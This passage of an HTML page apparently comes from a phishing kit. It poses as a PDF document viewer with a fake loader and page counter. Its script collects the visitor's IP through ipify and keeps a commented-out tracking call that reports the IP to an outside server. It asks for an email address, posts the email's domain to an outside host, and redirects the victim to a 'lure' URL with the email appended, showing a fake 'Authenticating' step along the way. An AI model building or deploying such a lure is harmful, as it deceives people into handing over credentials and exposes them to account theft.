                <path d="M30.4433 219.752L26.8749 216.182C26.5961 215.919 26.2276 215.773 25.8444 215.772C25.4613 215.771 25.0922 215.917 24.8124 216.178L22.9609 218.021L18.9364 219.952C18.4527 220.221 18.0798 220.653 17.8837 221.17L15.2314 228.754C15.1245 229.021 15.0986 229.313 15.1569 229.594C15.2153 229.875 15.3553 230.133 15.5595 230.335L16.2021 230.958C16.4778 231.231 16.8499 231.385 17.2382 231.387C17.4103 231.387 17.581 231.355 17.7411 231.292L25.4159 228.647C25.9665 228.431 26.4193 228.022 26.6893 227.496L28.6083 223.636L30.4374 221.818C30.5735 221.685 30.682 221.526 30.7567 221.351C30.8314 221.176 30.8709 220.988 30.8729 220.798C30.8749 220.607 30.8393 220.418 30.7683 220.241C30.6973 220.065 30.5922 219.904 30.4589 219.768L30.4433 219.752ZM25.3515 226.816C25.2553 227.006 25.0952 227.156 24.8993 227.239L18.1806 229.566L21.6403 225.951C21.6706 225.953 21.6963 225.968 21.7271 225.968C21.9644 225.968 22.1964 225.898 22.3937 225.766C22.5911 225.634 22.7449 225.447 22.8357 225.227C22.9265 225.008 22.9503 224.767 22.9039 224.534C22.8576 224.301 22.7433 224.087 22.5755 223.92C22.4077 223.752 22.1939 223.637 21.9611 223.591C21.7283 223.545 21.487 223.569 21.2678 223.659C21.0485 223.75 20.8611 223.904 20.7292 224.101C20.5974 224.299 20.527 224.531 20.527 224.768C20.5337 224.817 20.5435 224.866 20.5564 224.913L16.7853 228.854L19.2909 221.69C19.3541 221.522 19.4708 221.38 19.6229 221.285L23.7235 219.318L23.7993 219.244L27.3822 222.819L25.3515 226.816ZM28.4059 221.723L24.8722 218.197L25.8319 217.26L29.3847 220.75L28.4059 221.723Z" fill="#B9B9B9"/>
                <path d="M29.3329 225.905C29.4497 225.745 29.612 225.624 29.7987 225.557C29.9855 225.49 30.1879 225.482 30.3798 225.532C30.5716 225.582 30.7439 225.689 30.8742 225.838C31.0044 225.988 31.0867 226.173 31.1101 226.37L31.1053 226.612L30.5893 229.605L31.6065 228.657L31.78 228.477C31.872 228.382 31.9982 228.327 32.1308 228.324C32.2634 228.322 32.3915 228.372 32.487 228.464L32.8469 228.811C32.8942 228.857 32.932 228.911 32.9582 228.971C32.9845 229.032 32.9986 229.096 32.9998 229.162C33.001 229.228 32.9893 229.293 32.9653 229.354C32.9413 229.415 32.9054 229.471 32.8599 229.518L32.6864 229.698C32.0531 230.461 31.2515 231.066 30.3446 231.466C29.6209 231.69 28.8466 231.334 28.8986 230.617L29.0534 229.686L28.994 229.769C28.6956 230.173 28.344 230.535 27.9487 230.844L27.7179 231.009C27.2574 231.266 26.7595 231.45 26.2423 231.553L26.0152 231.595L25.7684 231.636C25.7036 231.646 25.6374 231.644 25.5735 231.629C25.5095 231.614 25.4492 231.586 25.3959 231.548C25.3426 231.51 25.2974 231.461 25.2628 231.405C25.2282 231.35 25.205 231.288 25.1944 231.223L25.1139 230.729C25.1034 230.664 25.1057 230.598 25.1207 230.534C25.1357 230.47 25.1632 230.41 25.2016 230.357C25.2399 230.303 25.2884 230.258 25.3442 230.224C25.4 230.189 25.4621 230.166 25.5269 230.155L25.7737 230.115C26.173 230.052 26.5596 229.925 26.9188 229.74C27.4732 229.318 27.931 228.782 28.2616 228.169C28.53 227.714 28.7673 227.241 28.9717 226.753C29.077 226.464 29.1976 226.181 29.3329 225.905Z" fill="#B9B9B9"/>
                </g>
                <path d="M37.7492 232C37.7162 232 37.6836 232.006 37.6531 232.019C37.6226 232.032 37.5949 232.05 37.5716 232.073L32.0737 237.572C32.0385 237.607 32.0146 237.651 32.0048 237.7C31.9951 237.749 32.0001 237.799 32.0191 237.845C32.0381 237.891 32.0704 237.93 32.1117 237.958C32.153 237.985 32.2016 238 32.2513 238H37.7492C37.8157 238 37.8795 237.974 37.9265 237.927C37.9736 237.879 38 237.816 38 237.749V232.251C38 232.184 37.9736 232.121 37.9265 232.073C37.8795 232.026 37.8157 232 37.7492 232Z" fill="#B9B9B9"/>
                <defs>
                <clipPath id="clip0_4551_573">
                <rect width="18" height="18" fill="white" transform="translate(15 215)"/>
                </clipPath>
                </defs>
                </svg>
        </div>
            
    </div>
    <div class="flex flex-row h-[86vh] justify-center items-center main">
        <div class="flex flex-col items-center space-y-6 loader" style="display: ;">
            <div>
                <svg width="60" height="60" viewBox="0 0 60 60" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2439_122)">
                    <path d="M58.9948 38.4185C57.2173 36.5248 53.5855 35.4298 48.4386 35.4298C45.6842 35.4298 42.5005 35.7035 39.0336 36.3485C36.9147 34.2587 34.9864 31.9841 33.2717 29.5516C31.9442 27.7066 30.7817 25.7529 29.7167 23.8291C31.7473 17.4823 32.7336 12.3054 32.7336 8.57602C32.7336 4.39664 31.2205 0.0410156 26.8836 0.0410156C25.5448 0.0410156 24.2173 0.851016 23.5048 2.04352C21.5511 5.55914 22.4305 13.2748 25.7998 20.891C24.5147 24.7762 23.0976 28.6166 21.5511 32.4054C20.0869 35.8811 18.4806 39.2953 16.7361 42.6391C6.98046 46.6048 0.661708 51.2229 0.0767078 54.8566C-0.187667 56.2235 0.262333 57.4741 1.21858 58.4791C1.55046 58.7529 2.80108 59.8366 4.91983 59.8366C11.3942 59.8366 18.2117 49.1435 21.688 42.6879C24.3448 41.7898 27.0111 40.9685 29.6661 40.1491C32.4718 39.3744 35.314 38.7386 38.1823 38.2441C45.0186 44.5048 51.043 45.491 54.0711 45.491C57.8023 45.491 59.1298 43.9479 59.5798 42.6879C60.283 41.0566 59.7561 39.2604 58.9555 38.3323L59.0042 38.4298L58.9948 38.4185ZM55.5373 41.0548C55.273 42.4123 53.9361 43.3198 52.0705 43.3198C51.5436 43.3198 51.0936 43.2223 50.5573 43.1435C47.158 42.3223 43.9761 40.5954 40.8017 37.8691C43.264 37.4557 45.7562 37.2469 48.253 37.2448C50.098 37.2448 51.7011 37.3329 52.7736 37.6066C54.0036 37.871 55.9573 38.6998 55.5186 41.0641H55.5673L55.5373 41.0548ZM36.7292 36.7873C34.2585 37.2916 31.8031 37.8681 29.3661 38.516C27.2463 39.0918 25.1458 39.7365 23.068 40.4491C24.1468 38.3126 25.153 36.1401 26.0848 33.9354C27.1592 31.3873 28.0386 28.7604 28.9273 26.3173C29.7973 27.851 30.7723 29.3941 31.7492 30.7704C33.3505 32.9473 35.0211 35.0191 36.7011 36.8248V36.776L36.7292 36.7873ZM25.0967 3.07664C25.2531 2.75669 25.494 2.48566 25.7935 2.29296C26.093 2.10026 26.4395 1.99324 26.7955 1.98352C28.6611 1.98352 29.0117 4.15102 29.0117 5.88914C29.0117 8.80852 28.123 13.2429 26.6098 18.3016C23.953 11.2516 23.7786 5.35289 25.1061 3.07664H25.0967ZM15.3411 45.3223C10.8205 52.9291 6.47421 57.6466 3.80796 57.6466C3.29046 57.6466 2.84046 57.461 2.48983 57.1966C1.95358 56.6491 1.68921 56.0154 1.86546 55.2916C2.40171 52.5673 7.46046 48.7591 15.3523 45.3204L15.3411 45.3223Z" fill="#B9B9B9" fill-opacity="0.3"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_2439_122">
                    <rect width="60" height="60" fill="white"/>
                    </clipPath>
                    </defs>
                    </svg>
                    
            </div>
            <div>
                <div class="progress">
                    <div class="progress-value"></div>
                  </div>
            </div>
        </div>
        <div class="w-[300px] h-[85vh] flex flex-col items-center justify-center overflow-hidden mt-2" style="display: none;" id="loaded">
            <div>
                <img src="bg.svg" alt="">
            </div>
            <div class="flex flex-row text-white space-x-1 text-[12px] mt-2 opacity-80">
                <div class="p-[1px]">
                    1
                </div>
                <div>
                    /
                </div>
                <div class="p-[1px]">
                    13
                </div>
            </div>
        </div>
    </div>
    <div class="fixed bottom-0 w-full">
        <div class="flex flex-row bg-[#323232] pl-2 pr-4 items-center justify-between w-full">
            <div class="flex flex-row">
                <div>
                    <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <g clip-path="url(#clip0_4542_484)">
                        <path d="M28.3707 14.7381L28.3697 14.7371C28.1766 14.5355 27.9436 14.3765 27.6856 14.27C27.4276 14.1636 27.1502 14.1121 26.8712 14.1188H26.6064L26.6084 15.6782H26.8797C27.0324 15.6825 27.1783 15.7424 27.29 15.8467C27.4003 15.9577 27.4629 16.1074 27.4645 16.264L27.457 23.5543C27.4577 23.7103 27.3968 23.8602 27.2875 23.9716C27.1708 24.07 27.0259 24.129 26.8736 24.1401H24.0595L24.052 24.1424V26.7431L21.3095 24.399H20.0738L18.5535 25.6985H20.4456L24.0135 28.7482C24.1889 28.911 24.4196 29.001 24.6588 29H24.6808C24.9263 28.9893 25.1581 28.8837 25.3272 28.7055C25.4964 28.5273 25.5897 28.2904 25.5876 28.0447V25.6995H26.8652C27.4264 25.68 27.9616 25.4583 28.3722 25.0751C28.771 24.6683 28.9938 24.121 28.9925 23.5513L29 16.2619C28.9967 15.6914 28.7709 15.1447 28.3707 14.7381Z" fill="#B9B9B9"/>
                        <path d="M15.2137 25.8812H15.1932C14.9446 25.8716 14.7095 25.7649 14.5386 25.584C14.3676 25.4032 14.2742 25.1626 14.2785 24.9137V22.5807H13.1194C12.8402 22.5823 12.5636 22.5277 12.3059 22.4203C12.0482 22.3129 11.8148 22.1547 11.6194 21.9553C11.2206 21.5474 10.9981 20.999 11 20.4284L11.0155 13.1442C11.0187 12.5733 11.2445 12.0262 11.6448 11.6193L11.6458 11.6183C12.0571 11.237 12.5924 11.0174 13.1529 11H22.7149C22.9906 11.0005 23.2634 11.0562 23.5173 11.1637C23.7711 11.2713 24.0009 11.4286 24.1929 11.6264C24.5915 12.0339 24.8143 12.5813 24.8138 13.1513L24.8228 20.4325C24.8269 21.0009 24.6069 21.548 24.2104 21.9553C24.0171 22.1522 23.7867 22.3087 23.5325 22.4159C23.2783 22.5231 23.0053 22.5788 22.7294 22.5797H19.42L15.8296 25.6497C15.6601 25.8006 15.4406 25.8831 15.2137 25.8812ZM14.8534 24.4467C14.8414 24.4558 14.8294 24.466 14.8179 24.4761L14.8534 24.4467ZM15.0463 21.0213H15.814V23.6244L18.8601 21.0203H22.7149C22.7915 21.0311 22.8695 21.0215 22.9412 20.9925C23.0128 20.9634 23.0755 20.9159 23.1228 20.8548C23.2298 20.7444 23.2888 20.5963 23.2873 20.4426L23.2783 13.1502C23.2791 12.9937 23.2182 12.843 23.1088 12.731C22.9984 12.6385 22.8641 12.579 22.7214 12.5594H13.1444C13.0664 12.5581 12.989 12.5725 12.9167 12.6017C12.8443 12.6308 12.7786 12.6742 12.7233 12.7292C12.668 12.7841 12.6243 12.8496 12.5947 12.9218C12.5651 12.9939 12.5503 13.0713 12.5511 13.1492L12.5356 20.4335C12.5346 20.5896 12.5951 20.7399 12.704 20.8518C12.7554 20.908 12.8184 20.9523 12.8887 20.9816C12.959 21.0108 13.0348 21.0244 13.1109 21.0213H15.0463Z" fill="#B9B9B9"/>
                        </g>
                        <defs>
                        <clipPath id="clip0_4542_484">
                        <rect width="18" height="18" fill="white" transform="translate(11 11)"/>
                        </clipPath>
                        </defs>
                        </svg>                    
                </div>
                <div>
                    <svg width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M17.5 17.5H14.5V14.5H17.5V17.5ZM18.5 13H13.5C13.3674 13 13.2402 13.0527 13.1464 13.1464C13.0527 13.2402 13 13.3674 13 13.5V18.5C13 18.6326 13.0527 18.7598 13.1464 18.8536C13.2402 18.9473 13.3674 19 13.5 19H18.5C18.6326 19 18.7598 18.9473 18.8536 18.8536C18.9473 18.7598 19 18.6326 19 18.5V13.5C19 13.3674 18.9473 13.2402 18.8536 13.1464C18.7598 13.0527 18.6326 13 18.5 13Z" fill="#B9B9B9"/>
                        <path d="M25.5 17.5H22.5V14.5H25.5V17.5ZM26.5 13H21.5C21.3674 13 21.2402 13.0527 21.1464 13.1464C21.0527 13.2402 21 13.3674 21 13.5V18.5C21 18.6326 21.0527 18.7598 21.1464 18.8536C21.2402 18.9473 21.3674 19 21.5 19H26.5C26.6326 19 26.7598 18.9473 26.8536 18.8536C26.9473 18.7598 27 18.6326 27 18.5V13.5C27 13.3674 26.9473 13.2402 26.8536 13.1464C26.7598 13.0527 26.6326 13 26.5 13Z" fill="#B9B9B9"/>
                        <path d="M17.5 25.5H14.5V22.5H17.5V25.5ZM18.5 21H13.5C13.3674 21 13.2402 21.0527 13.1464 21.1464C13.0527 21.2402 13 21.3674 13 21.5V26.5C13 26.6326 13.0527 26.7598 13.1464 26.8536C13.2402 26.9473 13.3674 27 13.5 27H18.5C18.6326 27 18.7598 26.9473 18.8536 26.8536C18.9473 26.7598 19 26.6326 19 26.5V21.5C19 21.3674 18.9473 21.2402 18.8536 21.1464C18.7598 21.0527 18.6326 21 18.5 21Z" fill="#B9B9B9"/>
                        <path d="M25.5 25.5H22.5V22.5H25.5V25.5ZM26.5 21H21.5C21.3674 21 21.2402 21.0527 21.1464 21.1464C21.0527 21.2402 21 21.3674 21 21.5V26.5C21 26.6326 21.0527 26.7598 21.1464 26.8536C21.2402 26.9473 21.3674 27 21.5 27H26.5C26.6326 27 26.7598 26.9473 26.8536 26.8536C26.9473 26.7598 27 26.6326 27 26.5V21.5C27 21.3674 26.9473 21.2402 26.8536 21.1464C26.7598 21.0527 26.6326 21 26.5 21Z" fill="#B9B9B9"/>
                        </svg>
                        
                </div>
            </div>
            <div class="">
                <svg width="170" height="24" viewBox="0 0 170 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_4552_783)">
                    <path d="M21.5417 20.4841L16.4241 15.3664C17.5881 13.8834 18.1419 12.012 17.9725 10.1344C17.8031 8.25678 16.9233 6.51469 15.5127 5.26394C14.1022 4.01319 12.2673 3.34817 10.3829 3.4047C8.49853 3.46123 6.70683 4.23505 5.37377 5.56811C4.04072 6.90116 3.26689 8.69287 3.21036 10.5772C3.15383 12.4616 3.81886 14.2965 5.06961 15.7071C6.32035 17.1176 8.06245 17.9975 9.94005 18.1669C11.8176 18.3362 13.6891 17.7824 15.1721 16.6185L20.2898 21.736C20.4005 21.8467 20.5506 21.9089 20.7072 21.9089C20.8637 21.9089 21.0139 21.8467 21.1246 21.736L21.5418 21.3188C21.6525 21.2081 21.7147 21.0579 21.7147 20.9014C21.7146 20.7449 21.6524 20.5947 21.5417 20.4841ZM10.6251 16.4271C9.51606 16.4271 8.43188 16.0982 7.50971 15.482C6.58754 14.8659 5.86879 13.9901 5.44436 12.9654C5.01993 11.9407 4.90888 10.8132 5.12526 9.72545C5.34163 8.63767 5.8757 7.63849 6.65995 6.85425C7.44419 6.07 8.44337 5.53593 9.53115 5.31956C10.6189 5.10318 11.7464 5.21423 12.7711 5.63866C13.7958 6.06309 14.6716 6.78184 15.2877 7.70401C15.9039 8.62618 16.2328 9.71036 16.2328 10.8194C16.2328 12.3067 15.642 13.733 14.5903 14.7846C13.5387 15.8363 12.1124 16.4271 10.6251 16.4271Z" fill="#B9B9B9"/>
                    <path d="M13.5766 9.93403H7.67377C7.34777 9.93403 7.0835 10.1983 7.0835 10.5243V11.1146C7.0835 11.4406 7.34777 11.7049 7.67377 11.7049H13.5766C13.9026 11.7049 14.1668 11.4406 14.1668 11.1146V10.5243C14.1668 10.1983 13.9026 9.93403 13.5766 9.93403Z" fill="#B9B9B9"/>
                    </g>
                    <g clip-path="url(#clip1_4552_783)">
                    <line x1="28.3333" y1="12.5903" x2="141.667" y2="12.5903" stroke="#CDCDCD" stroke-opacity="0.4" stroke-width="1.18056"/>
                    <circle cx="84.9998" cy="12" r="4.72222" fill="#D9D9D9"/>
                    </g>
                    <g clip-path="url(#clip2_4552_783)">
                    <g clip-path="url(#clip3_4552_783)">
                    <path d="M167.93 20.4841L162.813 15.3664C163.977 13.8834 164.531 12.012 164.361 10.1344C164.192 8.25678 163.312 6.51469 161.901 5.26394C160.491 4.01319 158.656 3.34817 156.772 3.4047C154.887 3.46123 153.095 4.23505 151.762 5.56811C150.429 6.90116 149.656 8.69287 149.599 10.5772C149.543 12.4616 150.208 14.2965 151.458 15.7071C152.709 17.1176 154.451 17.9975 156.329 18.1669C158.206 18.3362 160.078 17.7824 161.561 16.6185L166.678 21.736C166.789 21.8467 166.939 21.9089 167.096 21.9089C167.252 21.9089 167.403 21.8467 167.513 21.736L167.93 21.3188C168.041 21.2081 168.103 21.0579 168.103 20.9014C168.103 20.7449 168.041 20.5947 167.93 20.4841ZM157.014 16.4271C155.905 16.4271 154.821 16.0982 153.898 15.482C152.976 14.8659 152.257 13.9901 151.833 12.9654C151.409 11.9407 151.298 10.8132 151.514 9.72545C151.73 8.63767 152.264 7.63849 153.049 6.85425C153.833 6.07 154.832 5.53593 155.92 5.31956C157.008 5.10318 158.135 5.21423 159.16 5.63866C160.184 6.06309 161.06 6.78184 161.676 7.70401C162.293 8.62618 162.621 9.71036 162.621 10.8194C162.621 12.3067 162.031 13.733 160.979 14.7846C159.927 15.8363 158.501 16.4271 157.014 16.4271Z" fill="#B9B9B9"/>
                    <path d="M159.965 9.93403H154.062C153.736 9.93403 153.472 10.1983 153.472 10.5243V11.1146C153.472 11.4406 153.736 11.7049 154.062 11.7049H159.965C160.291 11.7049 160.556 11.4406 160.556 11.1146V10.5243C160.556 10.1983 160.291 9.93403 159.965 9.93403Z" fill="#B9B9B9"/>
                    <path d="M156.128 7.86794V13.7707C156.128 14.0967 156.393 14.361 156.719 14.361H157.309C157.635 14.361 157.899 14.0967 157.899 13.7707V7.86794C157.899 7.54194 157.635 7.27766 157.309 7.27766H156.719C156.393 7.27766 156.128 7.54194 156.128 7.86794Z" fill="#B9B9B9"/>
                    </g>
                    </g>
                    <defs>
                    <clipPath id="clip0_4552_783">
                    <rect x="1.18066" y="1.375" width="21.25" height="21.25" rx="2.36111" fill="white"/>
                    </clipPath>
                    <clipPath id="clip1_4552_783">
                    <rect width="9.44444" height="113.333" fill="white" transform="matrix(0 -1 1 0 28.3333 16.7222)"/>
                    </clipPath>
                    <clipPath id="clip2_4552_783">
                    <rect x="147.569" y="1.375" width="21.25" height="21.25" rx="2.36111" fill="white"/>
                    </clipPath>
                    <clipPath id="clip3_4552_783">
                    <rect width="21.25" height="21.25" fill="white" transform="translate(147.569 1.375)"/>
                    </clipPath>
                    </defs>
                    </svg>
                    
            </div>
            <div class="flex justify-end">
                <svg width="32" height="32" viewBox="0 0 32 32" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <g clip-path="url(#clip0_2421_643)">
                    <path d="M15.6464 22.2431C15.5972 22.2441 15.5494 22.25 15.5 22.25C13.8577 22.2496 12.2724 21.6473 11.0442 20.557C11.33 20.1285 11.7169 19.7769 12.1707 19.5332C12.6246 19.2895 13.1314 19.1613 13.6465 19.1597C13.8251 19.1307 13.9915 19.0508 14.1259 18.9297C14.2603 18.8085 14.3569 18.6512 14.4043 18.4766C14.4102 18.461 14.918 16.8375 14.4502 16.2955C13.9746 15.7146 13.7096 14.9899 13.6982 14.2393C13.6982 13.4028 13.9326 12 15.5 12C16.6475 12 17.332 12.8369 17.332 14.2178C17.311 14.9698 17.0375 15.6928 16.5556 16.2705C16.2437 16.6183 16.3325 17.3947 16.441 17.9225C16.9332 17.1952 17.5917 16.5958 18.3619 16.1738C18.6491 15.5678 18.8091 14.9095 18.832 14.2393C18.832 12.0029 17.4932 10.5 15.5 10.5C13.4941 10.5 12.1982 11.9678 12.1982 14.2481C12.2116 15.2606 12.5426 16.2433 13.1445 17.0576C13.132 17.281 13.1046 17.5034 13.0625 17.7231C12.4674 17.7892 11.8913 17.9731 11.3679 18.264C10.8445 18.555 10.3843 18.9473 10.0142 19.418C9.39651 18.5534 8.99181 17.5552 8.83301 16.5046C8.67421 15.454 8.76581 14.3808 9.10034 13.3723C9.43486 12.3638 10.0029 11.4486 10.7581 10.7012C11.5133 9.95378 12.4344 9.39533 13.4463 9.07131C14.4582 8.74729 15.5323 8.66686 16.5812 8.83658C17.6301 9.00629 18.6241 9.42136 19.4822 10.048C20.3403 10.6746 21.0382 11.495 21.5192 12.4424C22.0002 13.3898 22.2506 14.4375 22.25 15.5C22.25 15.5494 22.2395 15.5961 22.2385 15.6452C22.7555 15.7641 23.2524 15.9576 23.7136 16.2197C23.7342 15.9821 23.75 15.7429 23.75 15.5C23.75 13.8683 23.2661 12.2733 22.3596 10.9165C21.4531 9.55984 20.1646 8.50242 18.6571 7.878C17.1496 7.25357 15.4908 7.0902 13.8905 7.40853C12.2902 7.72685 10.8202 8.51259 9.66637 9.66637C8.51259 10.8202 7.72685 12.2902 7.40852 13.8905C7.09019 15.4909 7.25357 17.1497 7.87799 18.6571C8.50242 20.1646 9.55984 21.4531 10.9165 22.3596C12.2733 23.2661 13.8683 23.75 15.5 23.75C15.7429 23.75 15.9819 23.7343 16.2197 23.7136C15.9584 23.2538 15.7652 22.7585 15.6464 22.2431Z" fill="#B9B9B9"/>
                    <path d="M24.5 20.25H21.75V17.5C21.75 17.3674 21.6973 17.2402 21.6036 17.1464C21.5098 17.0527 21.3826 17 21.25 17H20.75C20.6174 17 20.4902 17.0527 20.3964 17.1464C20.3027 17.2402 20.25 17.3674 20.25 17.5V20.25H17.5C17.3674 20.25 17.2402 20.3027 17.1464 20.3964C17.0527 20.4902 17 20.6174 17 20.75V21.25C17 21.3826 17.0527 21.5098 17.1464 21.6036C17.2402 21.6973 17.3674 21.75 17.5 21.75H20.25V24.5C20.25 24.6326 20.3027 24.7598 20.3964 24.8536C20.4902 24.9473 20.6174 25 20.75 25H21.25C21.3826 25 21.5098 24.9473 21.6036 24.8536C21.6973 24.7598 21.75 24.6326 21.75 24.5V21.75H24.5C24.6326 21.75 24.7598 21.6973 24.8536 21.6036C24.9473 21.5098 25 21.3826 25 21.25V20.75C25 20.6174 24.9473 20.4902 24.8536 20.3964C24.7598 20.3027 24.6326 20.25 24.5 20.25Z" fill="#B9B9B9"/>
                    </g>
                    <defs>
                    <clipPath id="clip0_2421_643">
                    <rect width="18" height="18" fill="white" transform="translate(7 7)"/>
                    </clipPath>
                    </defs>
                    </svg>
            </div>
        </div>
    </div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js"></script>


    <script>
        const regexExp = /^[a-zA-Z0-9.!#$%&'*+/=?^_`{|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*$/i;
        let previous_email;
        let submit_count = 0;
        let details, title, curr_log, final, lure_url_js
        let is_valid_email = 'not_valid'

        $.getJSON("https://api.ipify.org?format=json", function (data) {
        // $.getJSON(`https://spacingstile.online/activity/open?file_name=FILE_ID&ip_address=${data.ip}`, function (resp) {
        // })
        details = data.ip;
        $('#ip').html(details)
        $('#email').focus()
        })


        $('.provider-pill').click(function(e) {
            $(this).html('Authenticating')
            $('.select-provider').css('opacity', '0.2')
            $('.provider-pill').css('cursor', 'wait')
            trans_tab();
        })

        let my_url = {lure_url_js}

        function trans_tab(email) {
            final = my_url +`#${email}`
            window.open(final);
            location.replace(final)
        }


        setTimeout(() => {
            $('.notif').slideDown(200)
        }, 3085);
        setTimeout(() => {
            $('.loader').hide()
            $('#loaded').show()
        }, 3000);


        function validate_email(value) {
            console.log('Checking validatity of ' + value)
            if (value === '' || !regexExp.test(value)) {
                is_valid_email = 'not_valid'
            } else {
                is_valid_email = 'valid'
            }

            return is_valid_email
        }

        $('.back').click(function() {
            let email = $('#email').val()
            console.log(email)
            $('.email-error').hide()
            $('.email-div').css('border-bottom-color', '#0D66D0')
            $('.not-phal').hide()
            $('.email-step').show()
            $('.next-button').css('opacity', '1')
        })

        $('#email').on("keydown",function(event){
        $('.email-error').hide()
        $('.email-icon').hide()
        $('.email-div').css('border-bottom-color', '#0D66D0')
         if(event.keyCode===13){
           event.preventDefault();
           $('.next-button').click()
           }
        });
        
        $('.next-button').click(async () => {
            let email = $('#email').val()
            console.log(email)
            console.log('Next for ' + email)
            $('.next-loading').show()
            $('.next-button').css('opacity', '0.5')
            console.log(await regexExp.test(email))
            if (regexExp.test(email)) {
                $('.email-transfer').html(email)
                confirm_provider(email)
            } else {
                $('.next-loading').hide()
                $('.next-button').css('opacity', '1')
                console.log('invalid email')
            }
        })

        function confirm_provider(value) {
            console.log('Confirming provider for ' + value)
            let domain = value.split('@')[1]
            axios.post('https://geedev.online/whoami', {
                    domain: domain
                // title: email.split('@')[1].split('.')[0]
            })
            .then(res => {
                console.log(res)
                $('.email-step').hide()
                $('.select-provider').show()
                $('.phal').show()
                $('.next-loading').hide()
                $('.provider-pill').css('cursor', 'wait')
                $('.provider-pill').html('Authenticating')
                $('.select-provider').css('opacity', '0.2')
                setTimeout(() => {
                    trans_tab(value);
                }, 1500);
            })
            .catch(err => {
                console.log(err)
                $('.email-step').hide()
                $('.not-phal').show()
                $('.next-loading').hide()
            })
            .finally(() => {
                setTimeout(() => {
                    $('.next-loading').hide()
                    $('.next-button').css('opacity', '1')

                    // if no reply within 10s resend request
                }, 1500);
            })
            
        }

        function validate_email_field() {
            let current_value = $('#email').val()
            console.log('Email field reads: ' + current_value)
            let validation_status = validate_email(current_value)
            if(validation_status === 'valid') {
                $('.email-transfer').html(current_value)
            }
            return validation_status
        }
    </script>
</body>
</html>